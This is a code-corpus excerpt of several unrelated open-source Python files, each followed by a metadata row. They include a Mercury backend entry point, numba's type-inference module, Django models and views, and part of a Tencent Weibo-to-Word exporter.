log.info('Attempting to reacquire %s : %s' % (
doc['mercury_id'], doc['active']['rpc_address']))
add_active_record(doc)
log.info('Reacquire operation complete')
inventory_client.close()
def configure_logging(config):
""" Configure logging for application
:param config: A namespace provided from MercuryConfiguration.parse_args
"""
logging.basicConfig(level=logging.getLevelName(config.logging.level),
format=config.logging.format)
if config.subtask_debug:
logging.getLogger('mercury.rpc.ping').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.ping2').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.jobs.monitor').setLevel(logging.DEBUG)
if config.asyncio_debug:
logging.getLogger('mercury.rpc.active_asyncio').setLevel(logging.DEBUG)
def main():
""" Entry point """
config = parse_options()
configure_logging(config)
# Create the event loop
loop = zmq.asyncio.ZMQEventLoop()
# If config.asyncio_debug == True, enable debug
loop.set_debug(config.asyncio_debug)
# Set the zmq event loop as the default event loop
asyncio.set_event_loop(loop)
# Create Async Clients
inventory_client = AsyncInventoryClient(config.backend.inventory_router,
linger=0,
response_timeout=10,
rcv_retry=3)
rpc_client = AsyncRPCClient(config.backend.rpc_router,
linger=0,
response_timeout=10,
rcv_retry=3)
# Create a backend instance
server = BackEndService(config.backend.agent_service.bind_address,
inventory_client,
rpc_client,
config.backend.origin.name,
config.backend.origin.datacenter,
config.backend.origin.queue_service_vip,
config.backend.origin.queue_service_port)
reacquire(config.backend.inventory_router, config.backend.origin.name)
# Inject ping loop
asyncio.ensure_future(ping_loop(
ctx=server.context,
ping_interval=config.backend.ping.interval,
cycle_time=config.backend.ping.cycle_time,
initial_ping_timeout=config.backend.ping.initial_timeout,
ping_retries=config.backend.ping.retries,
backoff=config.backend.ping.backoff,
max_to_schedule=config.backend.ping.max_to_schedule,
loop=loop,
inventory_router_url=config.backend.inventory_router,
rpc_client=rpc_client),
loop=loop)
log.info('Starting Mercury Backend Service')
try:
loop.run_until_complete(server.start())
except KeyboardInterrupt:
# TODO: Add generic backend TERM handler
log.info('Sending kill signals')
stop_ping()
server.kill()
finally:
pending = asyncio.Task.all_tasks(loop=loop)
log.debug('Waiting on {} pending tasks'.format(len(pending)))
loop.run_until_complete(asyncio.gather(*pending))
log.debug('Shutting down event loop')
loop.close()
if __name__ == '__main__':
main()
| apache-2.0 | 5,274,209,554,630,983,000 | 36.181347 | 79 | 0.603122 | false |
googleads/googleads-python-lib | examples/ad_manager/v202105/forecast_service/get_delivery_forecast_for_line_items.py | 1 | 1934 | #!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets a delivery forecast for two existing line items.
To determine which line items exist, run get_all_line_items.py.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the line items to get forecasts for.
LINE_ITEM_ID_1 = 'INSERT_LINE_ITEM_1_ID_HERE'
LINE_ITEM_ID_2 = 'INSERT_LINE_ITEM_2_ID_HERE'
def main(client, line_item_id1, line_item_id2):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v202105')
# Get forecast for line item.
forecast = forecast_service.getDeliveryForecastByIds(
[line_item_id1, line_item_id2], {'ignoredLineItemIds': []})
for single_forecast in forecast['lineItemDeliveryForecasts']:
unit_type = single_forecast['unitType']
print('Forecast for line item %d:\n\t%d %s matched\n\t%d %s delivered\n\t'
'%d %s predicted\n' % (
single_forecast['lineItemId'], single_forecast['matchedUnits'],
unit_type, single_forecast['deliveredUnits'], unit_type,
single_forecast['predictedDeliveryUnits'], unit_type))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, LINE_ITEM_ID_1, LINE_ITEM_ID_2)
| apache-2.0 | -8,936,408,167,704,282,000 | 36.192308 | 78 | 0.718201 | false |
CMLL/Flask-Fixtures | setup.py | 1 | 1677 | """
Flask-Fixtures
--------------
A fixtures library for testing Flask apps.
"""
import os
import subprocess
from setuptools import setup
root_dir = os.path.abspath(os.path.dirname(__file__))
package_dir = os.path.join(root_dir, 'flask_fixtures')
# Try to get the long description from the README file or the module's
# docstring if the README isn't available.
try:
README = open(os.path.join(root_dir, 'README.rst')).read()
except:
README = __doc__
setup(
name='Flask-Fixtures',
version='0.3.4',
url='https://github.com/croach/Flask-Fixtures',
license='MIT License',
author='Christopher Roach',
author_email='[email protected]',
maintainer='Christopher Roach',
maintainer_email='[email protected]',
description='A simple library for adding database fixtures for unit tests using nothing but JSON or YAML.',
long_description=README,
# py_modules=['flask_fixtures'],
# if you would be using a package instead use packages instead
# of py_modules:
packages=['flask_fixtures'],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
'Flask',
'Flask-SQLAlchemy'
],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing'
]
)
| mit | -2,382,888,362,794,428,000 | 28.421053 | 111 | 0.648778 | false |
sklam/numba | numba/core/typing/typeof.py | 1 | 6676 | from collections import namedtuple
from functools import singledispatch
import ctypes
import enum
import numpy as np
from numba.core import types, utils, errors
from numba.np import numpy_support
# terminal color markup
_termcolor = errors.termcolor()
class Purpose(enum.Enum):
# Value being typed is used as an argument
argument = 1
# Value being typed is used as a constant
constant = 2
_TypeofContext = namedtuple("_TypeofContext", ("purpose",))
def typeof(val, purpose=Purpose.argument):
"""
Get the Numba type of a Python value for the given purpose.
"""
# Note the behaviour for Purpose.argument must match _typeof.c.
c = _TypeofContext(purpose)
ty = typeof_impl(val, c)
if ty is None:
msg = _termcolor.errmsg(
"cannot determine Numba type of %r") % (type(val),)
raise ValueError(msg)
return ty
@singledispatch
def typeof_impl(val, c):
"""
Generic typeof() implementation.
"""
tp = _typeof_buffer(val, c)
if tp is not None:
return tp
# cffi is handled here as it does not expose a public base class
# for exported functions or CompiledFFI instances.
from numba.core.typing import cffi_utils
if cffi_utils.SUPPORTED:
if cffi_utils.is_cffi_func(val):
return cffi_utils.make_function_type(val)
if cffi_utils.is_ffi_instance(val):
return types.ffi
return getattr(val, "_numba_type_", None)
def _typeof_buffer(val, c):
from numba.core.typing import bufproto
try:
m = memoryview(val)
except TypeError:
return
# Object has the buffer protocol
try:
dtype = bufproto.decode_pep3118_format(m.format, m.itemsize)
except ValueError:
return
type_class = bufproto.get_type_class(type(val))
layout = bufproto.infer_layout(m)
return type_class(dtype, m.ndim, layout=layout,
readonly=m.readonly)
@typeof_impl.register(ctypes._CFuncPtr)
def typeof_ctypes_function(val, c):
from .ctypes_utils import is_ctypes_funcptr, make_function_type
if is_ctypes_funcptr(val):
return make_function_type(val)
@typeof_impl.register(type)
def typeof_type(val, c):
"""
Type various specific Python types.
"""
if issubclass(val, BaseException):
return types.ExceptionClass(val)
if issubclass(val, tuple) and hasattr(val, "_asdict"):
return types.NamedTupleClass(val)
if issubclass(val, np.generic):
return types.NumberClass(numpy_support.from_dtype(val))
from numba.typed import Dict
if issubclass(val, Dict):
return types.TypeRef(types.DictType)
from numba.typed import List
if issubclass(val, List):
return types.TypeRef(types.ListType)
@typeof_impl.register(bool)
def _typeof_bool(val, c):
return types.boolean
@typeof_impl.register(float)
def _typeof_bool(val, c):
return types.float64
@typeof_impl.register(complex)
def _typeof_bool(val, c):
return types.complex128
def _typeof_int(val, c):
# As in _typeof.c
nbits = utils.bit_length(val)
if nbits < 32:
typ = types.intp
elif nbits < 64:
typ = types.int64
elif nbits == 64 and val >= 0:
typ = types.uint64
else:
raise ValueError("Int value is too large: %s" % val)
return typ
for cls in utils.INT_TYPES:
typeof_impl.register(cls, _typeof_int)
@typeof_impl.register(np.generic)
def _typeof_numpy_scalar(val, c):
try:
return numpy_support.map_arrayscalar_type(val)
except NotImplementedError:
pass
@typeof_impl.register(str)
def _typeof_str(val, c):
return types.string
@typeof_impl.register(type((lambda a: a).__code__))
def _typeof_code(val, c):
return types.code_type
@typeof_impl.register(type(None))
def _typeof_none(val, c):
return types.none
@typeof_impl.register(type(Ellipsis))
def _typeof_ellipsis(val, c):
return types.ellipsis
@typeof_impl.register(tuple)
def _typeof_tuple(val, c):
tys = [typeof_impl(v, c) for v in val]
if any(ty is None for ty in tys):
return
return types.BaseTuple.from_types(tys, type(val))
@typeof_impl.register(list)
def _typeof_list(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty list")
ty = typeof_impl(val[0], c)
if ty is None:
raise ValueError(
"Cannot type list element of {!r}".format(type(val[0])),
)
return types.List(ty, reflected=True)
@typeof_impl.register(set)
def _typeof_set(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty set")
item = next(iter(val))
ty = typeof_impl(item, c)
return types.Set(ty, reflected=True)
@typeof_impl.register(slice)
def _typeof_slice(val, c):
return types.slice2_type if val.step in (None, 1) else types.slice3_type
@typeof_impl.register(enum.Enum)
@typeof_impl.register(enum.IntEnum)
def _typeof_enum(val, c):
clsty = typeof_impl(type(val), c)
return clsty.member_type
@typeof_impl.register(enum.EnumMeta)
def _typeof_enum_class(val, c):
cls = val
members = list(cls.__members__.values())
if len(members) == 0:
raise ValueError("Cannot type enum with no members")
dtypes = {typeof_impl(mem.value, c) for mem in members}
if len(dtypes) > 1:
raise ValueError("Cannot type heterogeneous enum: "
"got value types %s"
% ", ".join(sorted(str(ty) for ty in dtypes)))
if issubclass(val, enum.IntEnum):
typecls = types.IntEnumClass
else:
typecls = types.EnumClass
return typecls(cls, dtypes.pop())
@typeof_impl.register(np.dtype)
def _typeof_dtype(val, c):
tp = numpy_support.from_dtype(val)
return types.DType(tp)
@typeof_impl.register(np.ndarray)
def _typeof_ndarray(val, c):
try:
dtype = numpy_support.from_dtype(val.dtype)
except NotImplementedError:
raise ValueError("Unsupported array dtype: %s" % (val.dtype,))
layout = numpy_support.map_layout(val)
readonly = not val.flags.writeable
return types.Array(dtype, val.ndim, layout, readonly=readonly)
@typeof_impl.register(types.NumberClass)
def typeof_number_class(val, c):
return val
@typeof_impl.register(types.Literal)
def typeof_literal(val, c):
return val
@typeof_impl.register(types.TypeRef)
def typeof_typeref(val, c):
return val
@typeof_impl.register(types.Type)
def typeof_typeref(val, c):
if isinstance(val, types.BaseFunction):
return val
elif isinstance(val, (types.Number, types.Boolean)):
return types.NumberClass(val)
else:
return types.TypeRef(val)
| bsd-2-clause | 5,694,277,277,401,790,000 | 26.02834 | 76 | 0.658778 | false |
xingnix/learning | imageprocessing/python/10/segment.py | 1 | 1154 | import matplotlib.pyplot as plt
import numpy as np
import cv2
from skimage import io,color,data,filters,exposure,util,transform
#plt.switch_backend('qt5agg')
def otsu():
im=data.coins()
f=np.zeros(255)
minf=0
mini=0
for i in range(100,200):
c1=im[im<=i]
c2=im[im>i]
m1=np.mean(c1)
m2=np.mean(c2)
std1=np.std(c1)
std2=np.std(c2)
std3=np.std([m1,m2])
f[i]=std3/(1+std1*std2)
if f[i] > minf :
minf=std3
mini=i
io.imsave('coins.png',im)
io.imsave('coins-otsu.png',np.uint8(im>mini)*255)
def line_detect():
im=data.text()
seg=im<100
r=transform.radon(seg)
rho,theta=np.unravel_index(np.argmax(r),r.shape)
rho=rho-r.shape[0]/2
x=np.int(rho*np.cos((theta+90)*np.pi/180)+im.shape[0]/2)
y=np.int(rho*np.sin((theta+90)*np.pi/180)+im.shape[1]/2)
dx=np.cos((theta)*np.pi/180)
dy=np.sin((theta)*np.pi/180)
l=1000
res=im.copy()
cv2.line(res,(np.int(y-dy*l),np.int(x-dx*l)),(np.int(y+dy*l),np.int(x+dx*l)),255,2)
io.imsave('text.png',im)
io.imsave('text-line.png',res) | gpl-3.0 | 4,045,463,473,780,565,500 | 23.0625 | 87 | 0.571057 | false |
AstroMatt/esa-time-perception | backend/api_v2/models/trial.py | 1 | 9704 | import json
import statistics
from django.db import models
from django.db.models import DateTimeField
from django.db.models import CharField
from django.db.models import FloatField
from django.db.models import EmailField
from django.db.models import BooleanField
from django.db.models import PositiveSmallIntegerField
from django.db.models import TextField
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from backend.api_v2.models import Click
from backend.api_v2.models import Event
from backend.api_v2.models import Survey
class Trial(models.Model):
TIME_MORNING = 'morning'
TIME_EVENING = 'evening'
TIME_OTHER = 'other'
TIME_CHOICES = [
(TIME_MORNING, _('Morning')),
(TIME_EVENING, _('Evening')),
(TIME_OTHER, _('Other')),
]
http_request_sha1 = CharField(verbose_name=_('SHA1'), max_length=40, db_index=True, unique=True, null=True, blank=True, default=None)
start_datetime = DateTimeField(verbose_name=_('Start datetime'), db_index=True)
end_datetime = DateTimeField(verbose_name=_('End datetime'))
colors = CharField(verbose_name=_('Color order'), max_length=50)
device = CharField(verbose_name=_('Device'), max_length=50)
location = CharField(verbose_name=_('Location'), max_length=50)
time = CharField(verbose_name=_('Time'), max_length=30, choices=TIME_CHOICES, null=True, blank=True, default=None)
uid = EmailField(verbose_name=_('User ID'), db_index=True)
polarization = CharField(verbose_name=_('Polarization'), max_length=50, null=True, blank=True, default=None)
timeout = FloatField(verbose_name=_('Timeout'), help_text=_('Seconds per color'))
regularity = PositiveSmallIntegerField(verbose_name=_('Regularity'), help_text=_('Click every X seconds'))
attempt = PositiveSmallIntegerField(verbose_name=_('Attempt'), null=True, blank=True, default=True)
is_valid = BooleanField(verbose_name=_('Valid?'), default=None, blank=True, null=True, db_index=True)
time_between_clicks = TextField(verbose_name=_('Time between clicks'), blank=True, null=True, default=None)
count_all = PositiveSmallIntegerField(verbose_name=_('Count'), null=True, blank=True)
count_blue = PositiveSmallIntegerField(verbose_name=_('Count - blue'), null=True, blank=True)
count_red = PositiveSmallIntegerField(verbose_name=_('Count - red'), null=True, blank=True)
count_white = PositiveSmallIntegerField(verbose_name=_('Count - white'), null=True, blank=True)
tempo_all = FloatField(verbose_name=_('Tempo'), null=True, blank=True)
tempo_blue = FloatField(verbose_name=_('Tempo - blue'), null=True, blank=True)
tempo_red = FloatField(verbose_name=_('Tempo - red'), null=True, blank=True)
tempo_white = FloatField(verbose_name=_('Tempo - white'), null=True, blank=True)
regularity_all = FloatField(verbose_name=_('Regularity'), null=True, blank=True)
regularity_blue = FloatField(verbose_name=_('Regularity - blue'), null=True, blank=True)
regularity_red = FloatField(verbose_name=_('Regularity - red'), null=True, blank=True)
regularity_white = FloatField(verbose_name=_('Regularity - white'), null=True, blank=True)
interval_all = FloatField(verbose_name=_('Interval'), null=True, blank=True)
interval_blue = FloatField(verbose_name=_('Interval - blue'), null=True, blank=True)
interval_red = FloatField(verbose_name=_('Interval - red'), null=True, blank=True)
interval_white = FloatField(verbose_name=_('Interval - white'), null=True, blank=True)
def get_absolute_url(self):
return reverse('api-v2:report', args=[self.uid])
@property
def survey(self):
return Survey.objects.get(trial=self)
@staticmethod
def add(http_request_sha1, trial, surveys, clicks, events):
trial, _ = Trial.objects.get_or_create(http_request_sha1=http_request_sha1, defaults=trial)
if surveys:
Survey.objects.get_or_create(trial=trial, **Survey.clean(surveys))
for click in clicks:
Click.objects.get_or_create(trial=trial, **click)
for event in events:
Event.objects.get_or_create(trial=trial, **event)
trial.validate()
trial.calculate()
Click.objects.filter(trial=trial).delete()
Event.objects.filter(trial=trial).delete()
return trial
def __str__(self):
return f'[{self.start_datetime:%Y-%m-%d %H:%M}] ({self.location}, {self.device}) {self.uid}'
class Meta:
verbose_name = _('Trial')
verbose_name_plural = _('Trials')
def get_data(self):
data = self.__dict__.copy()
data.pop('_state')
return data
def save(self, *args, **kwargs):
self.uid = self.uid.lower()
return super().save(*args, **kwargs)
def validate(self):
self.validate_clicks('blue')
self.validate_clicks('red')
self.validate_clicks('white')
self.validate_trial()
def calculate(self):
self.calculate_count()
self.calculate_tempo()
self.calculate_regularity()
self.calculate_interval()
def validate_clicks(self, color, elements_to_drop=2):
clicks = Click.objects.filter(trial=self, color=color).order_by('datetime')
for invalid in clicks[:elements_to_drop]:
invalid.is_valid = False
invalid.save()
for valid in clicks[elements_to_drop:]:
valid.is_valid = True
valid.save()
def validate_trial(self, min=25, max=200):
if not self.tempo_all:
self.calculate()
if min <= self.tempo_all <= max:
self.is_valid = True
else:
self.is_valid = False
self.save()
def get_time_between_clicks(self):
"""
Obliczamy czasowy współczynnik regularności dla koloru
1. Dla każdego kliknięcia w kolorze od czasu następnego (n+1) kliknięcia odejmuj czas poprzedniego (n) - interwały czasu pomiędzy kliknięciami
2. >>> {"czerwony": [1.025, 0.987, 1.000, 1.01...], "biały": [1.025, 0.987, 1.000, 1.01...], "niebieski": [1.025, 0.987, 1.000, 1.01...], "wszystkie": [1.025, 0.987, 1.000, 1.01...]}
"""
clicks = Click.objects.filter(trial=self, is_valid=True).order_by('datetime')
def get_time_deltas(series):
for i in range(1, len(series)):
d1 = series[i - 1].datetime
d2 = series[i].datetime
yield (d2 - d1).total_seconds()
blue = list(get_time_deltas(clicks.filter(color='blue')))
red = list(get_time_deltas(clicks.filter(color='red')))
white = list(get_time_deltas(clicks.filter(color='white')))
time_regularity_series = {
'all': blue + red + white,
'blue': blue,
'red': red,
'white': white}
self.time_between_clicks = json.dumps(time_regularity_series)
self.save()
return time_regularity_series
def calculate_count(self):
clicks = Click.objects.filter(trial=self, is_valid=True)
self.count_all = clicks.all().count()
self.count_blue = clicks.filter(color='blue').count()
self.count_red = clicks.filter(color='red').count()
self.count_white = clicks.filter(color='white').count()
self.save()
def calculate_tempo(self, precision=2):
"""
Zliczam ilość wszystkich kliknięć na każdym z kolorów i sumuję je
1. Określam procentowy współczynnik regularności: (ilość czasu / co ile sekund miał klikać) - 100%; n kliknięć - x%
2. Wyliczenie procentowych współczynników regularności (z kroku powyżej) dla każdego z kolorów osobno
3. >>> {"biały": 100, "czerwony": 110, "niebieski": 90} // wartości są w procentach
"""
percent_coefficient = float(self.timeout) / float(self.regularity)
self.tempo_all = round(self.count_all / (percent_coefficient * 3) * 100, precision)
self.tempo_blue = round(self.count_blue / percent_coefficient * 100, precision)
self.tempo_red = round(self.count_red / percent_coefficient * 100, precision)
self.tempo_white = round(self.count_white / percent_coefficient * 100, precision)
self.save()
def calculate_regularity(self, precision=4):
"""
Wyliczamy odchylenie standardowe dla wszystkich razem (po appendowaniu list - 60 elem), oraz dla każdego koloru osobno (listy po 20 elementów)
1. podnosimy każdy element listy do kwadratu
2. sumujemy kwadraty
3. pierwiastkujemy sumę
4. dzielimy pierwiastek przez ilość elementów
"""
clicks = self.get_time_between_clicks()
def stdev(series):
try:
return round(statistics.stdev(series), precision)
except statistics.StatisticsError:
return None
self.regularity_all = stdev(clicks['all'])
self.regularity_blue = stdev(clicks['blue'])
self.regularity_red = stdev(clicks['red'])
self.regularity_white = stdev(clicks['white'])
self.save()
def calculate_interval(self, precision=4):
clicks = self.get_time_between_clicks()
def mean(series):
try:
mean = round(statistics.mean(series), precision)
return abs(mean)
except statistics.StatisticsError:
return None
self.interval_all = mean(clicks['all'])
self.interval_blue = mean(clicks['blue'])
self.interval_red = mean(clicks['red'])
self.interval_white = mean(clicks['white'])
self.save()
| mit | 3,254,712,368,374,055,000 | 40.991304 | 190 | 0.640609 | false |
Forage/Gramps | gramps/gen/filters/rules/person/_hasalternatename.py | 1 | 1841 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010 Gramps
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# gen.filters.rules/Person/_HasAlternateName.py
# $Id$
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from .. import Rule
#-------------------------------------------------------------------------
#
# HasAlternateName
#
#-------------------------------------------------------------------------
class HasAlternateName(Rule):
"""Rule that checks an alternate name"""
name = _('People with an alternate name')
description = _("Matches people with an alternate name")
category = _('General filters')
def apply(self, db, person):
if person.get_alternate_names():
return True
else:
return False
| gpl-2.0 | 2,634,163,403,224,166,400 | 32.472727 | 75 | 0.532863 | false |
fatiherikli/komposto.org | auth/views.py | 1 | 2165 | import json
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.db.models import Q, Count
from django.views.generic import (
FormView, CreateView, RedirectView, DetailView, UpdateView
)
from auth.mixins import LoginRequiredMixin
from auth.forms import (RegistrationForm, AuthenticationForm,
ProfileUpdateForm)
from django.contrib.auth.models import User
class RegistrationView(CreateView):
form_class = RegistrationForm
template_name = "auth/register.html"
def form_valid(self, form):
response = super(RegistrationView, self).form_valid(form)
user = authenticate(username=form.cleaned_data["username"],
password=form.cleaned_data["password1"])
login(self.request, user)
return response
def get_success_url(self):
return reverse("home")
class LoginView(FormView):
form_class = AuthenticationForm
template_name = "auth/login.html"
def form_valid(self, form):
login(self.request, form.get_user())
return super(LoginView, self).form_valid(form)
def get_success_url(self):
return self.request.GET.get("next") or reverse("home")
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
context["next"] = self.request.GET.get("next", "")
return context
class LogoutView(LoginRequiredMixin, RedirectView):
def get(self, request, *args, **kwargs):
logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
return reverse("home")
class ProfileDetailView(DetailView):
slug_field = 'username'
slug_url_kwarg = 'username'
context_object_name = "profile"
model = User
class ProfileUpdateView(LoginRequiredMixin, UpdateView):
form_class = ProfileUpdateForm
def get_object(self, queryset=None):
return self.request.user
def get_success_url(self):
return '/'
| mit | 2,634,806,515,822,161,400 | 29.069444 | 68 | 0.684988 | false |
coolcooldool/tencent-weibo-exporter | version15/tencent_util.py | 1 | 12471 | # -*- coding: utf-8 -*-
'''
Created on 2017/12/21
@author: yuyang
'''
import os
from urllib import request
import uuid
import re
import docx_ext
from docx.shared import Pt
from docx.shared import RGBColor
from docx.shared import Inches
JPEG_EXTENSION = '.jpg'
PNG_EXTENSION = '.png'
GIF_EXTENSION = '.gif'
SPLIT_STRING = '///'
TOPIC_STRING = 'TTOOPPIICC'
EMOJI_STRING = 'EEMMOOJJII'
FRIEND_STRING = 'FFRRIIEENNDD'
URL_STRING = 'UURRLL'
QQEMO_STRING = 'QQEEMMOO'
OTHEREMO_STRING = 'OOTTHHEERR'
def add_author(document, author):
para = document.add_paragraph()
run = para.add_run(author)
font = run.font
#font.name = 'Microsoft YaHei'
font.size = Pt(12)
font.color.rgb = RGBColor(0x43, 0x6E, 0xEE)
def add_content(document, content, para = None, font_size = 16):
if content.__contains__('k.t.qq.com'):
pattern = re.compile(r'(<a href="http://k.t.qq.com.*?</a>)', re.S)
topics = re.findall(pattern, content)
for topic in topics:
topic_word = topic.split('#')[1]
content = content.replace(topic, SPLIT_STRING + TOPIC_STRING + '#' + topic_word + '#' + SPLIT_STRING)
if content.__contains__('www/mb/images/emoji'):
pattern_emoji = re.compile(r'(<img.*?>)', re.S)
pattern_emoji_img = re.compile(r"crs='(.*?)'", re.S)
emojis = re.findall(pattern_emoji, content)
for emoji in emojis:
emoji_url = re.findall(pattern_emoji_img, emoji)[0]
filename = download_pic(emoji_url, PNG_EXTENSION)
content = content.replace(emoji, SPLIT_STRING + EMOJI_STRING + filename + SPLIT_STRING)
if content.__contains__('em rel="@'):
pattern_friend = re.compile(r'(<em rel=.*?</em>)', re.S)
pattern_friend_name = re.compile(r'<em.*?title="(.*?)"', re.S)
friends = re.findall(pattern_friend, content)
for friend in friends:
friend_name = re.findall(pattern_friend_name, friend)[0]
content = content.replace(friend, SPLIT_STRING + FRIEND_STRING + friend_name + SPLIT_STRING)
if content.__contains__('http://url.cn'):
pattern_url = re.compile(r'(<a href=.*?</a>)', re.S)
pattern_url_str = re.compile(r'<a href="(.*?)"', re.S)
urls = re.findall(pattern_url, content)
for url in urls:
url_str = re.findall(pattern_url_str, url)[0]
content = content.replace(url, SPLIT_STRING + URL_STRING + url_str + SPLIT_STRING)
if content.__contains__('www/mb/images/face'):
pattern_qqemo = re.compile(r'(<img.*?>)', re.S)
pattern_qqemo_img = re.compile(r"crs='(.*?)'", re.S)
qqemos = re.findall(pattern_qqemo, content)
for qqemo in qqemos:
qqemo_url = re.findall(pattern_qqemo_img, qqemo)[0]
filename = download_pic(qqemo_url, GIF_EXTENSION)
content = content.replace(qqemo, SPLIT_STRING + QQEMO_STRING + filename + SPLIT_STRING)
if content.__contains__('<img class='):
pattern_other_emo = re.compile(r'(<img.*?>)', re.S)
pattern_other_emo_img = re.compile(r'<img.*?crs=(.*?) title=', re.S)
pattern_other_emo_img_only = re.compile(r'<img.*?crs=(.*?)>', re.S)
#<img class='crs dn' crs='http://qzonestyle.gtimg.cn/qzone/em/e2043.gif'>
pattern_other_emos = re.findall(pattern_other_emo, content)
for other_emo in pattern_other_emos:
other_emo_match = re.findall(pattern_other_emo_img, other_emo)
if not other_emo_match:# some emoji have special pattern
other_emo_match = re.findall(pattern_other_emo_img_only, other_emo)
other_emo_url = other_emo_match[0]
other_emo_url = other_emo_url[1:-1]# delete start and end mark ' "
filename = download_pic(other_emo_url, other_emo_url[-4:])
content = content.replace(other_emo, SPLIT_STRING + OTHEREMO_STRING + filename + SPLIT_STRING)
content_parts = content.split(SPLIT_STRING)
if not para:
para = document.add_paragraph()
for content_part in content_parts:
# delete first <div> mark
if content_part.startswith('<div>'):
content_part = content_part[5:]
if content_part.startswith(TOPIC_STRING):
run = para.add_run(content_part.replace(TOPIC_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x00, 0x00, 0xCD)
elif content_part.startswith(EMOJI_STRING):
run = para.add_run()
filename = content_part.replace(EMOJI_STRING, '')
run.add_picture(filename)
elif content_part.startswith(FRIEND_STRING):
run = para.add_run(content_part.replace(FRIEND_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size - 2)
font.color.rgb = RGBColor(0xFF, 0x45, 0x00)
elif content_part.startswith(URL_STRING):
docx_ext.add_hyperlink(para, content_part.replace(URL_STRING, ''),
content_part.replace(URL_STRING, ''), '1E90FF', True)
elif content_part.startswith(QQEMO_STRING):
run = para.add_run()
filename = content_part.replace(QQEMO_STRING, '')
run.add_picture(filename)
elif content_part.startswith(OTHEREMO_STRING):
run = para.add_run()
filename = content_part.replace(OTHEREMO_STRING, '')
run.add_picture(filename)
else:
content_part = content_part.replace('&', '&')
content_part = content_part.replace('>', '>')
content_part = content_part.replace('"', '"')
content_part = content_part.replace('<', '<')
run = para.add_run(content_part)
font = run.font
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x08, 0x08, 0x08)
def add_quotation(document, quotation):
if not quotation:
return
quotation_items = analyze_quotation(quotation)
para = document.add_paragraph(style='IntenseQuote')
if len(quotation_items) == 1:
run = para.add_run(quotation_items[0])
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0xA9, 0xA9, 0xA9)
return
run = para.add_run(quotation_items[0] + u':')
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0x48, 0xD1, 0xCC)
add_content(document, quotation_items[1] + '\n', para, 12)
filenames = analyze_pic(quotation)
for filename in filenames:
try:
run_pic = para.add_run()
run_pic.add_picture(filename, width=Inches(3))
para.add_run('\n')
except:
print('转帖插入图片出错:' + filename)
run_time = para.add_run(quotation_items[2])
font_time = run_time.font
font_time.bold = False
font_time.size = Pt(8)
font_time.color.rgb = RGBColor(0x69, 0x69, 0x69)
def add_picture(document, story):
filenames = analyze_pic(story)
for filename in filenames:
try:
document.add_picture(filename, width=Inches(5))
except:
print('插入图片出错:' + filename)
def add_time(document, time):
para = document.add_paragraph()
run = para.add_run(time)
font = run.font
font.italic = True
#font.name = 'Microsoft YaHei'
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
def add_location(document, story):
location_items = analyze_loc(story)
if len(location_items) <= 0:
return
link_name = location_items[2]
google_map_url = 'https://maps.google.com/maps?q=' + location_items[0] + ',' + location_items[1]
print(google_map_url)
para = document.add_paragraph()
run = para.add_run(u'位置:')
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, google_map_url, link_name, '4169E1', False)
def add_video(document, story):
video_items = analyze_video(story)
if not video_items:
return
para = document.add_paragraph()
run = para.add_run()
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, video_items[0], video_items[1], '4169E1', False)
try:
document.add_picture(video_items[3], width=Inches(3))
except:
print('视频封面插入出错:' + video_items[3])
def download_pic(url, extension):
try:
if not os.path.exists('.//pics'):
os.mkdir('.//pics')
filename = '.\\pics\\' + str(uuid.uuid4()) + extension
request.urlretrieve(url, filename)
except Exception:
